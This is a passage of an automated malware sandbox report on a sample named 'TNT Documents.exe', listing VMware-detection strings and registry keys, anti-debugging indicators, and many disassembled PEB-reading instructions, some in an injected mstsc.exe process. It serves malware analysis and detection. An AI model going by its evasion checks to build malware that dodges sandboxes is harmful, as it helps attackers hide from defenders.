Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.339998059.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004088E0 rdtsc 7_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\TNT Documents.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h] 7_2_0157B944
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h] 7_2_0155B171
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C962 mov eax, dword ptr fs:[00000030h] 7_2_0155C962
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559100 mov eax, dword ptr fs:[00000030h] 7_2_01559100
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158513A mov eax, dword ptr fs:[00000030h] 7_2_0158513A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov eax, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov ecx, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0155B1E1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E41E8 mov eax, dword ptr fs:[00000030h] 7_2_015E41E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582990 mov eax, dword ptr fs:[00000030h] 7_2_01582990
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C182 mov eax, dword ptr fs:[00000030h] 7_2_0157C182
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A185 mov eax, dword ptr fs:[00000030h] 7_2_0158A185
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h] 7_2_015D51BE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h] 7_2_015861A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D69A6 mov eax, dword ptr fs:[00000030h] 7_2_015D69A6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01570050 mov eax, dword ptr fs:[00000030h] 7_2_01570050
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01612073 mov eax, dword ptr fs:[00000030h] 7_2_01612073
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621074 mov eax, dword ptr fs:[00000030h] 7_2_01621074
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h] 7_2_015D7016
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] 7_2_0158002D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01624015 mov eax, dword ptr fs:[00000030h] 7_2_01624015
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h] 7_2_0156B02A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov ecx, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015558EC mov eax, dword ptr fs:[00000030h] 7_2_015558EC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559080 mov eax, dword ptr fs:[00000030h] 7_2_01559080
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h] 7_2_015D3884
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0158F0BF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h] 7_2_0158F0BF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015990AF mov eax, dword ptr fs:[00000030h] 7_2_015990AF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155F358 mov eax, dword ptr fs:[00000030h] 7_2_0155F358
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB40 mov eax, dword ptr fs:[00000030h] 7_2_0155DB40
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h] 7_2_01583B7A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB60 mov ecx, dword ptr fs:[00000030h] 7_2_0155DB60
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628B58 mov eax, dword ptr fs:[00000030h] 7_2_01628B58
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161131B mov eax, dword ptr fs:[00000030h] 7_2_0161131B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h] 7_2_015D53CA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157DBE9 mov eax, dword ptr fs:[00000030h] 7_2_0157DBE9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01625BA5 mov eax, dword ptr fs:[00000030h] 7_2_01625BA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158B390 mov eax, dword ptr fs:[00000030h] 7_2_0158B390
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582397 mov eax, dword ptr fs:[00000030h] 7_2_01582397
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h] 7_2_01561B8F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160D380 mov ecx, dword ptr fs:[00000030h] 7_2_0160D380
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161138A mov eax, dword ptr fs:[00000030h] 7_2_0161138A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h] 7_2_01584BAD
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h] 7_2_0160B260
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628A62 mov eax, dword ptr fs:[00000030h] 7_2_01628A62
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E4257 mov eax, dword ptr fs:[00000030h] 7_2_015E4257
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559240 mov eax, dword ptr fs:[00000030h] 7_2_01559240
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159927A mov eax, dword ptr fs:[00000030h] 7_2_0159927A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161EA55 mov eax, dword ptr fs:[00000030h] 7_2_0161EA55
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h] 7_2_0155AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov eax, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov ecx, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01573A1C mov eax, dword ptr fs:[00000030h] 7_2_01573A1C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01568A0A mov eax, dword ptr fs:[00000030h] 7_2_01568A0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h] 7_2_01594A2C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h] 7_2_0161AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582ACB mov eax, dword ptr fs:[00000030h] 7_2_01582ACB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582AE4 mov eax, dword ptr fs:[00000030h] 7_2_01582AE4
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h] 7_2_0158D294
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0156AAB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0158FAB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] 7_2_015552A5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01577D50 mov eax, dword ptr fs:[00000030h] 7_2_01577D50
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01593D43 mov eax, dword ptr fs:[00000030h] 7_2_01593D43
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3540 mov eax, dword ptr fs:[00000030h] 7_2_015D3540
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h] 7_2_0157C577
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628D34 mov eax, dword ptr fs:[00000030h] 7_2_01628D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161E539 mov eax, dword ptr fs:[00000030h] 7_2_0161E539
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h] 7_2_01584D3B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AD30 mov eax, dword ptr fs:[00000030h] 7_2_0155AD30
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015DA537 mov eax, dword ptr fs:[00000030h] 7_2_015DA537
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0161FDE2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01608DF1 mov eax, dword ptr fs:[00000030h] 7_2_01608DF1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov ecx, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0156D5E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h] 7_2_0158FD9B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016205AC mov eax, dword ptr fs:[00000030h] 7_2_016205AC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 mov eax, dword ptr fs:[00000030h] 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] 7_2_01552D8A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h] 7_2_01581DB5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015835A1 mov eax, dword ptr fs:[00000030h] 7_2_015835A1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h] 7_2_015EC450
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A44B mov eax, dword ptr fs:[00000030h] 7_2_0158A44B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157746D mov eax, dword ptr fs:[00000030h] 7_2_0157746D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h] 7_2_015D6C0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162740D mov eax, dword ptr fs:[00000030h] 7_2_0162740D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158BC2C mov eax, dword ptr fs:[00000030h] 7_2_0158BC2C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016114FB mov eax, dword ptr fs:[00000030h] 7_2_016114FB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h] 7_2_015D6CF0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628CD6 mov eax, dword ptr fs:[00000030h] 7_2_01628CD6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156849B mov eax, dword ptr fs:[00000030h] 7_2_0156849B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628F6A mov eax, dword ptr fs:[00000030h] 7_2_01628F6A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156EF40 mov eax, dword ptr fs:[00000030h] 7_2_0156EF40
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156FF60 mov eax, dword ptr fs:[00000030h] 7_2_0156FF60
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157F716 mov eax, dword ptr fs:[00000030h] 7_2_0157F716
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h] 7_2_015EFF10
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h] 7_2_0158A70E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158E730 mov eax, dword ptr fs:[00000030h] 7_2_0158E730
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162070D mov eax, dword ptr fs:[00000030h] 7_2_0162070D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h] 7_2_01554F2E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015937F5 mov eax, dword ptr fs:[00000030h] 7_2_015937F5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01568794 mov eax, dword ptr fs:[00000030h] 7_2_01568794
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h] 7_2_015D7794
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h] 7_2_01567E41
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h] 7_2_0157AE73
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h] 7_2_0161AE44
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156766D mov eax, dword ptr fs:[00000030h] 7_2_0156766D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h] 7_2_0158A61C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h] 7_2_0155C600
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01588E00 mov eax, dword ptr fs:[00000030h] 7_2_01588E00
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160FE3F mov eax, dword ptr fs:[00000030h] 7_2_0160FE3F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611608 mov eax, dword ptr fs:[00000030h] 7_2_01611608
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155E620 mov eax, dword ptr fs:[00000030h] 7_2_0155E620
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015836CC mov eax, dword ptr fs:[00000030h] 7_2_015836CC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01598EC7 mov eax, dword ptr fs:[00000030h] 7_2_01598EC7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0160FEC0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628ED6 mov eax, dword ptr fs:[00000030h] 7_2_01628ED6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015676E2 mov eax, dword ptr fs:[00000030h] 7_2_015676E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015816E0 mov ecx, dword ptr fs:[00000030h] 7_2_015816E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h] 7_2_01620EA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h] 7_2_01620EA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h] 7_2_01620EA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EFE87 mov eax, dword ptr fs:[00000030h] 7_2_015EFE87
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D46A7 mov eax, dword ptr fs:[00000030h] 7_2_015D46A7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D7D50 mov eax, dword ptr fs:[00000030h] 17_2_055D7D50
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F3D43 mov eax, dword ptr fs:[00000030h] 17_2_055F3D43
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05633540 mov eax, dword ptr fs:[00000030h] 17_2_05633540
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h] 17_2_055DC577
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h] 17_2_055DC577
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0563A537 mov eax, dword ptr fs:[00000030h] 17_2_0563A537
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688D34 mov eax, dword ptr fs:[00000030h] 17_2_05688D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567E539 mov eax, dword ptr fs:[00000030h] 17_2_0567E539
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h] 17_2_055E4D3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h] 17_2_055E4D3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h] 17_2_055E4D3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BAD30 mov eax, dword ptr fs:[00000030h] 17_2_055BAD30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05668DF1 mov eax, dword ptr fs:[00000030h] 17_2_05668DF1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov ecx, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h] 17_2_055CD5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h] 17_2_055CD5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056805AC mov eax, dword ptr fs:[00000030h] 17_2_056805AC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056805AC mov eax, dword ptr fs:[00000030h] 17_2_056805AC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h] 17_2_055EFD9B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h] 17_2_055EFD9B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h] 17_2_055E1DB5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h] 17_2_055E1DB5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h] 17_2_055E1DB5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E35A1 mov eax, dword ptr fs:[00000030h] 17_2_055E35A1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA44B mov eax, dword ptr fs:[00000030h] 17_2_055EA44B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D746D mov eax, dword ptr fs:[00000030h] 17_2_055D746D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h] 17_2_0564C450
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h] 17_2_0564C450
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
